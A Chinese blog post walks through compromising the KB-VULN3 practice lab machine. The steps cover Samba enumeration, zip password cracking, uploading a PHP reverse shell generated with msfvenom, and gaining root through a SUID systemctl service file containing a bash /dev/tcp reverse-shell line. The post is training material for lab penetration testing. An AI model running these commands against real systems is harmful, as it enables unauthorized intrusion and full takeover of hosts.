KB-VULN3靶机总结

最新推荐文章于 2023-10-27 09:50:43 发布
最新推荐文章于 2023-10-27 09:50:43 发布
阅读量212 收藏
点赞数
分类专栏: 靶机测试 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45301512/article/details/128605512
版权
文章讲述了对KB-VULN3靶机进行渗透测试的过程,首先通过nmap扫描发现开放的22、80、139和445端口,然后利用139和445端口的Samba后门漏洞,找到可利用的Files共享文件夹。通过fcrackzip工具破解zip密码,获取网站源代码,进一步利用网站的无防护文件上传功能,上传php反弹shell,最终通过systemctl的suid权限提升至root。
摘要由CSDN通过智能技术生成

KB-VULN3靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/kbvuln/KB-VULN3.ova

  1. 打开靶机,将网络连接模式改成NAT,然后使用namp扫描端口,发现没有ip,利用网上搜索出来的方法,修改了靶机在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 再次使用namp扫描了网段之后,发现了ip和打开的端口
    可以看到,开放了22端口,80端口,139端口和445端口
    在这里插入图片描述

  3. 先根据80端口打开网站,就是这样一个页面,什么功能也没有在这里插入图片描述

  4. 在目录扫描一波,看看目录下有没有可以利用的网站
    结果是除了首页,没有其它网页了
    在这里插入图片描述

  5. 一般我们的渗透测试都是利用网站的漏洞,但是这里似乎网站没有可以利用的地方
    那我们换个角度,它开放了4个端口,22端口和80端口是我们所熟知的,但是这个445和139端口,以往渗透靶机也没怎么有看见过,很有可能这里就是突破口,因此我百度了一下445端口和139端口的漏洞利用,还真发现一个

    139和445的Samba后门漏洞
    网站: https://cloud.tencent.com/developer/article/1079631?ivk_sa=1024320u

  6. 根据百度的结果,试验了一下,发现的确存在445端口漏洞,存在一个共享文件夹Files
    并且提示都是HACK ME ,证明我们的思路是对的在这里插入图片描述
    这里也可以用enum4linux 192.168.11.139
    也可以扫出共享文件Files在这里插入图片描述
    在这里插入图片描述
    然后可以直接使用smbclient 来查看共享文件夹,百度的那个方法使用完后会多出个rootfs文件,但是也打不开那个,权限不够在这里插入图片描述
    那么主要就是这个website.zip文件,根据名字,猜测是网站相关
    想办法打开这个文件,这里利用网上搜索的方法,使用get命令,下载到本地主机

    在这里插入图片描述

    解压需要密码
    在这里插入图片描述
    网上的方法都是爆破,使用一个工具fcrackzip
    kali没有这个工具,先安装在这里插入图片描述
    这个工具使用的字典是kali自带的/usr/share/wordlists/rockyou.txt
    这里需要先解压下在这里插入图片描述
    在这里插入图片描述
    然后使用

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u website.zip

    在这里插入图片描述
    打开之后是sitemagic目录和readme.txt在这里插入图片描述
    readme.txt给出了一个网站域名,还有账户密码在这里插入图片描述
    sitemagic目录里面是这个在这里插入图片描述

  7. 我们先改下域名在这里插入图片描述
    通过域名打开网站
    在这里插入图片描述

  8. 先利用给出的账户密码登录一下在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  9. 接下来我们查看这个网站是否存在可以利用的漏洞,发现存在一个文件上传的功能点在这里插入图片描述在这里插入图片描述
    并且发现,没有防护,可以直接上传任意文件,这里测试一个php文件
    在这里插入图片描述
    抓包看了下文件路径在这里插入图片描述
    是我写的hello没错在这里插入图片描述

  10. 可以访问之后就简单了,上传一个php的反弹shell,利用msf获得shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o /home/kali/Desktop/shell.php

    在这里插入图片描述
    上传上去
    在这里插入图片描述
    先利用msf开启监听在这里插入图片描述
    再访问shell.php在这里插入图片描述
    成功获得shell
    在这里插入图片描述

  11. 紧接着考虑提权,sudo无法提权,计划任务无法使用,passwd无法写入,然后suid提权,发现存在一个systemctl,可以使用suid提权在这里插入图片描述
    在提权网站上https://gtfobins.github.io/ 找到systemctl的suid提权

    sudo install -m =xs $(which systemctl) .
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

    在这里插入图片描述
    首先编写一个service 文件,让开启服务的时候反弹到kali的7777端口

    [Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.131/7777 0>&1'

[Install]
WantedBy=multi-user.target

    在这里插入图片描述
    然后上传到网站的某个目录下,这里上传一个一句话木马,就可以连接到蚁剑了,方便上传文件,但是提权还是用msf,比较稳定在这里插入图片描述
    创建服务

    systemctl link /var/www/html/sitemagic/shell.service

    在这里插入图片描述
    本地开启7777端口监听在这里插入图片描述
    然后开启这个服务

    systemctl start shell.service

    在这里插入图片描述
    成功获得root的shell在这里插入图片描述

Beilay()
关注
专栏目录
KB_VULN3
logan_logan的博客
12-19 292
KIOPTRIX: LEVEL 1.2 (#3) 在浏览器输入IP地址,是一个404网页,接下来开始进行信息收集; 信息收集 2.1 端口扫描。发现存在samba服务,不错哦。 2.2 目录枚举,没有扫到有价值的目录。 2.3 Samba信息枚举 使用enum4linux工具进行枚举,扫描到有一个共享目录/Files和heisenberg用户。 登录samba共享文件夹,存在一个website.zip文件,下载下来之后发现加密,使用fcrackzip破解压缩包密码,得到密码porchm
vulhub - SECARMY VILLAGE: GRAYHAT CONFERENCE writeup
Jiajiajiang_的博客
05-24 933
主机发现 && 端口扫描 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描这次用的是threader3000 https://blog.csdn.net/Jiajiajiang_/article/details/117220625 好用 ------------------------------------------------------------ Threader 3000 - Multi-threaded.
kb-vuln3 靶机 wp
m0_52496313的博客
09-28 470
kb-vuln3 靶机 wp
靶机渗透练习51-KB-VULN3
hirak0的博客
04-19 365
靶机描述 靶机地址:https://www.vulnhub.com/entry/kb-vuln-3,579/ Description This machine is the kind that will measure your research ability. This VM is running on VirtualBox.It includes 2 flags:user.txt and root.txt. This works better with VirtualBox rather tha
靶机渗透练习52-KB-VULN-FINAL
hirak0的博客
04-19 542
靶机描述 靶机地址:https://www.vulnhub.com/entry/kb-vuln-4-final,648/ Description This machine is the kind that will measure your level in both research and exploit development. It includes 2 flags:user.txt and root.txt. This works better with VirtualBox rather
kb-vuln3(systemctl提权)
m0_66299232的博客
10-23 910
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell。9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异。systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功。攻击机系统:kali linux 2021.1。
红日安全靶场3
weixin_48169878的博客
07-13 4298
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
20194311姜晨昊Exp6-MSF应用基础
weixin_51927594的博客
05-10 585
零、实验准备 安装win7虚拟机,迅雷下载种子如下 ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/ VM简易安装,一直下一步即可 一、实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。 1.1 一个主动攻击实践 使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 永恒之蓝是指201
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6905
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
红队专题-Perm权限提升与维持隐匿Privilege Escalation
最新发布
aming小老弟
10-27 885
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
VulnHub靶场之KB-VULN: 2
A_dmin的博客
10-25 649
VulnHub靶场之KB-VULN: 2 扫描IP以及端口: 访问80端口,默认页面,,,,进行目录扫描,熟悉的wordpress: 访问一下,发现显示不全,,,查看一下网页源代码: 添加hosts文件: 再次访问正常,wpscan扫描一下,啥都没扫出来,,,,: 有个admin页面但是没有账号密码进不去,,, 选择转向其他,不是还有个smb么,尝试一下能否匿名登录,有个备份文件: 打开得到一个账号密码,wordpress后台的吧,,,admin/MachineBoy141 尝试登陆,登陆成
vuln KB-VULN: 1记录
qq_45826388的博客
09-23 437
Description Machine Level : Medium Description : ENUMERATION ENUMERATION and ENUMERATION! This VM is running on VirtualBox. And has 2 flags:user.txt and flag.txt. 靶机:192.168.34.162 端口扫描 源码中发现username hydra 爆破 ssh ,得到密码 登录成功, 家目录下就一个用户 查看sysadmin 目录,得
Tryhackme - Vulnversity (考点:上传 & burp intruder & systemctl提权)
冬萍子癸水
05-25 730
1 扫描 21想到进去找文件,22可能有ssh登录,139 445 去smb找文件,3128可能有代理转发,3333是http web进去搜集信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |
云计算-Linux-特殊权限-SUID-SGID-SBIT-ACL
weixin_48137911的博客
10-03 597
然后呢,acl上,设置权限,赋予了这个读写的权限,针对这个/etc的这个目录。这个代表这个目录有r权限,证明普通用户在这个绿色的目录下,干什么都行。首先呢,我这的用户有一堆,我就用这个我的id-ccie-yasuo了。但是注意哈,是不能删tmp的,他在根目录下呢,root才能删。代表他的权限有点大~首先呢,这个cat是在这个/use/bin的目录下的。他不是rwx,而是rws,这个s就这个特殊的权限了。显示这个权限是+号的,则代表是ACL添加的权限了。在这个目录下,虽然有权限,但是呢是删除不了的。
vulnhub-KB-VULN: 1
yutianovo的博客
09-12 525
靶机描述 This is an easy box, pretty basic stuff. It's vmware based, i dont know if it works on VB you can test it if you want. There are 2 flags under /home/$user/user.txt & /root/root.txt. No stupid ctfy/guessy stuff. For any help/hint feel free to D
CentOS 7 上systemctl 的用法
weixin_34293911的博客
10-20 383
CentOS 7 上systemctl 的用法我们对service和chkconfig两个命令都不陌生,systemctl 是管制服务的主要工具, 它整合了chkconfig 与 service功能于一体。systemctl is-enabled iptables.servicesystemctl is-enabled servicename.service #查询服务是否开...
Tryhackme-Basic Computer Exploitation
个人博客
08-10 423
Basic Computer Exploitation 文章目录Basic Computer ExploitationVulnversity :star:反弹shell :star:systemctl提权task1 Deploy the machinetask2 Reconnaissancetask3 Locating directories using GoBustertask4 Compromise the webservertask5 Privilege EscalationBasic Pente
Tryhackme-Vulnversity
个人博客
09-14 428
Vulnversity ⭐️反弹shell ⭐️systemctl提权 文章目录Vulnversity :star:反弹shell :star:systemctl提权task1 Deploy the machinetask2 Reconnaissancetask3 Locating directories using GoBustertask4 Compromise the webservertask5 Privilege Escalation task1 Deploy the machine 无需回答
靶机渗透测试(UA: Literally Vulnerable)
@小张小张的博客
11-19 1285
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
nmap --script=vuln
06-28
nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值